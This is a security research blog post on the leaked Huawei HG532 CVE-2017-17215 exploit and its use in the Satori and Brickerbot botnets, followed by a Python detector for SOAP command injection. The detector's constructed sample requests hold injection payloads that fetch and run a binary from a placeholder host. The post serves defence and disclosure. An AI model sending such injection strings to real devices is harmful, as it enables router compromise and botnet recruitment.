Huawei router exploit involved in Satori and Brickerbot given away for free on Christmas by…
Introduction
NewSky Security observed that a known threat actor released working exploit code for the Huawei vulnerability CVE-2017-17215 on Pastebin this Christmas, free of charge. This exploit had already been weaponized in two distinct IoT botnets, Satori and Brickerbot.
CVE-2017-17215, a vulnerability in Huawei HG532 devices, was discovered by Checkpoint while Satori was exploiting it as a zero-day, and was reported discreetly to Huawei for a fix. The proof-of-concept code was withheld to keep attackers from abusing it. With the full code now released by the threat actor, we expect it to be picked up far more widely by script kiddies and copy-paste botnet masters.
Exploit usage in Brickerbot and Satori: a comparison
Interestingly, Satori is not the only botnet in which this exploit has been implemented. Earlier in December, the Brickerbot threat actor Janitor claimed to be retiring his project and released a dump containing snippets of Brickerbot source code. While analyzing this code, we also found CVE-2017-17215 in use, implying that the exploit has been in blackhats' hands for a while. In the image below, a snippet of the leaked Brickerbot code shows the command injection in the <NewStatusURL> parameter as well as the string "echo HUAWEIUPNP" in the <NewDownloadURL> parameter of the SOAP request. This command injection is the very basis of CVE-2017-17215.
Let us compare this with a binary of the Satori botnet (in the image below). Not only do we see the same attack vector, i.e. command injection in <NewStatusURL>, but we also see the same indicator string "echo HUAWEIUPNP", implying that Satori and Brickerbot copied the exploit code from the same source.
All of these indicators are also present in the working exploit code leaked on Pastebin, as shown below.
To limit the potential for abuse, NewSky Security will not publish the Pastebin link in this blog.
SOAP issues in the past
This is not the first time that IoT botnets have made use of issues in the SOAP protocol. Earlier this year we observed several Mirai offshoots using two other SOAP bugs, CVE-2014-8361 and TR-064, which are command injections in the <NewInternalClient> and <NewNTPServer> parameters respectively. In the image below, the disassembly of a Mirai variant shows both exploits used together to increase the chances of a successful attack.
When it comes to weaponized bugs in SOAP handling, even Windows has not been untouched. We have already seen attacks exploiting CVE-2017-8759, where root-cause analysis showed MS Word invoking the .NET SOAP handler, which in turn parsed a WSDL definition; a bug in that WSDL parsing made code injection possible, resulting in weaponized RTF files.
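The indicators described in the Satori/Brickerbot comparison above and in this section (shell metacharacters inside the <NewStatusURL>/<NewDownloadURL> parameters for CVE-2017-17215, <NewInternalClient> for CVE-2014-8361, <NewNTPServer> for TR-064, and the "echo HUAWEIUPNP" marker shared by both botnets' copies of the exploit) can be turned into a simple request-body check. The following Python is an added example, not NewSky Security's code or anything from the leaked exploit. The SOAP request bodies in it are constructed for the example, the 203.0.113.5 address is a TEST-NET placeholder, and matching the numbered TR-064 form NewNTPServer1 is an assumption; it also goes a little beyond the text by falling back to a regex when the body is not well-formed XML, so a sloppy request does not slip past the check.

```python
"""Flag command-injection attempts in SOAP/UPnP request bodies.

Added example (not NewSky Security's code). It checks the SOAP parameters
named on the page as injection sinks for shell metacharacters and for the
"HUAWEIUPNP" marker seen in both the Satori and Brickerbot exploit copies.
"""
import re
import xml.etree.ElementTree as ET

# Parameter name -> bug it is the injection sink for (names taken from the page).
WATCHED_PARAMS = {
    "NewStatusURL": "CVE-2017-17215",
    "NewDownloadURL": "CVE-2017-17215",
    "NewInternalClient": "CVE-2014-8361",
    "NewNTPServer": "TR-064",
}

# Anything that lets a "URL" or "host" value escape into a shell:
# command substitution, backticks, separators, pipes, newlines.
SHELL_META = re.compile(r"\$\(|`|;|\|\||&&|\||\r|\n")

# Exploit-code marker present in both botnets' copies of the exploit.
MARKER = "HUAWEIUPNP"

# Fallback extractor for bodies that are not well-formed XML.
TAG_RE = re.compile(r"<(?:\w+:)?(New\w+)>(.*?)</(?:\w+:)?\1>", re.S)


def bug_for(name):
    """Map a SOAP parameter name to the bug it belongs to, or None."""
    if name.startswith("NewNTPServer"):   # assumption: TR-064 uses NewNTPServer1..5
        return "TR-064"
    return WATCHED_PARAMS.get(name)


def _local(tag):
    """Strip a '{namespace}' prefix from an ElementTree tag name."""
    return tag.rsplit("}", 1)[-1]


def extract_params(body):
    """Return [(param_name, text)] for every watched parameter in the body."""
    try:
        root = ET.fromstring(body)
        pairs = [(_local(e.tag), e.text or "") for e in root.iter()]
    except ET.ParseError:
        pairs = TAG_RE.findall(body)       # malformed body: best-effort regex
    return [(n, v) for n, v in pairs if bug_for(n)]


def inspect_soap_body(body):
    """Return a list of findings; an empty list means nothing suspicious."""
    findings = []
    for name, value in extract_params(body):
        reasons = []
        if SHELL_META.search(value):
            reasons.append("shell metacharacters")
        if MARKER in value:
            reasons.append("HUAWEIUPNP marker")
        if reasons:
            findings.append({"param": name, "bug": bug_for(name),
                             "value": value, "reason": ", ".join(reasons)})
    return findings


# Constructed sample bodies (not captured traffic). Well-formed Huawei-style request:
HUAWEI_SAMPLE = (
    '<?xml version="1.0"?>'
    '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">'
    '<s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">'
    '<NewStatusURL>$(/bin/busybox wget http://203.0.113.5/x -O /tmp/x;/tmp/x)</NewStatusURL>'
    '<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>'
    '</u:Upgrade></s:Body></s:Envelope>'
)

# Same shape with ordinary URL values: must produce no finding.
BENIGN_SAMPLE = (
    '<?xml version="1.0"?>'
    '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">'
    '<s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">'
    '<NewStatusURL>http://192.168.1.1/status</NewStatusURL>'
    '<NewDownloadURL>http://192.168.1.1/fw.bin</NewDownloadURL>'
    '</u:Upgrade></s:Body></s:Envelope>'
)

# TR-064-style body whose envelope is never closed (not well-formed XML).
TR064_SAMPLE = (
    '<?xml version="1.0"?>'
    '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">'
    '<SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">'
    '<NewNTPServer1>`cd /tmp;wget http://203.0.113.5/bin`</NewNTPServer1>'
    '</u:SetNTPServers></SOAP-ENV:Body>'
)

if __name__ == "__main__":
    for label, body in (("huawei", HUAWEI_SAMPLE), ("benign", BENIGN_SAMPLE),
                        ("tr064", TR064_SAMPLE)):
        for f in inspect_soap_body(body):
            print(f"{label}: {f['bug']} via <{f['param']}> ({f['reason']}): {f['value']!r}")
```

Run against the constructed bodies, the Huawei sample yields two findings (the <NewDownloadURL> one carrying both the metacharacter and marker reasons), the benign sample none, and the malformed TR-064 sample one finding via the regex fallback. In a real deployment this would be applied to request bodies seen on the UPnP port of the device, or to captured botnet traffic.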
Conclusion
IoT attacks are becoming more modular by the day. When an IoT exploit becomes freely available, it takes little time for threat actors to add it to their arsenal as one more attack vector in their botnet code. Prior to the Huawei bug, NewSky Security had already observed the leak of a Netgear router exploit (aka NbotLoader), which led to that code being integrated into the well-known Qbot botnet.
To protect devices against CVE-2017-17215, Huawei has released a security notice.
Ankit Anubhav, Principal Researcher, NewSky Security